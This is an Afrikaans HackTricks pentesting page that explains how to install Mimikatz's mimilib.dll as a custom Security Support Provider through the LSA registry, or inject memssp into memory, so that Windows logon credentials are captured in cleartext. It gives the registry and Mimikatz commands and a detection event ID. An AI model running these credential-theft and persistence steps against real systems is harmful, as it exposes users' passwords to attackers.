hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md
2024-02-11 02:07:06 +00:00

3.7 KiB

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Aangepaste SSP

Leer wat 'n SSP (Security Support Provider) is hier.
Jy kan jou eie SSP skep om die inligting in klarteks vas te vang wat gebruik word om toegang tot die rekenaar te verkry.

Mimilib

Jy kan die mimilib.dll binêre lêer gebruik wat deur Mimikatz voorsien word. Dit sal alle inligting in klarteks in 'n lêer log.
Plaas die dll in C:\Windows\System32\
Kry 'n lys van bestaande LSA Security Packages:

{% code title="aanvaller@teiken" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

Voeg mimilib.dll by die Security Support Provider-lys (Security Packages) by:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

En na 'n herlaai kan alle geloofsbriewe in duidelike teks in C:\Windows\System32\kiwissp.log gevind word.

In geheue

Jy kan dit ook direk in die geheue inspuit deur gebruik te maak van Mimikatz (let daarop dat dit 'n bietjie onstabiel/ nie werkend kan wees):

privilege::debug
misc::memssp

Hierdie sal nie oorleef na herlaai nie.

Versagting

Gebeurtenis ID 4657 - Toets skepping/verandering van HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: